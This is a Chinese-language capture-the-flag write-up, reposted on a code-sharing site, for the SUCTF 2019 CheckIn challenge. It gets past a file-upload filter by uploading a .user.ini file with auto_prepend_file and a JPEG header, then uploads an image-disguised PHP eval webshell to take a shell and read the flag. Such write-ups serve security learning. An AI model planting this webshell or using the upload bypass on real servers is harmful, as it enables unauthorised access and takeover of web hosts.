码迷,mamicode.com
首页 > Web开发 > 详细

[SUCTF 2019]CheckIn(user.ini文件构成的php后门)

时间:2020-02-10 14:05:12      阅读:97      评论:0      收藏:0      [点我收藏+]

标签:题目   语言   tps   其他   wooyun   http   auto   通过   提示   

 

参考博客:https://www.cnblogs.com/20175211lyz/p/11455355.html

首先先来看看.user.ini文件

技术图片

 

 

利用.user.ini上传\隐藏后门

参考链接:user.ini文件构成的PHP后门

条件:

  • 1、服务器脚本语言为PHP
  • 2、服务器使用CGI/FastCGI模式
  • 3、上传目录下要有可执行的php文件

对于这道题目,已经提示了需要上传文件拿shell,上传一句话木马后提示需要上传图片,上传图片马又发现被过滤了<?。随后从其他dalao博客发现,可以上传.user.ini文件

auto_prepend_file=test.jpg (需要添加图片文件头FFD8FFE000104A4649460D0A)

同时再上传图片马

<script language="php">eval($_POST[‘a‘]);</script>(同样需要添加上列图片文件头)

技术图片

 

 此时通过Post可以拿shell

再进行文件扫描技术图片发现技术图片

 

 于是通过readfile()函数拿到flag技术图片

 

 技术图片

 

[SUCTF 2019]CheckIn(user.ini文件构成的php后门)

标签:题目   语言   tps   其他   wooyun   http   auto   通过   提示   

原文地址:https://www.cnblogs.com/MisakaYuii-Z/p/12290471.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!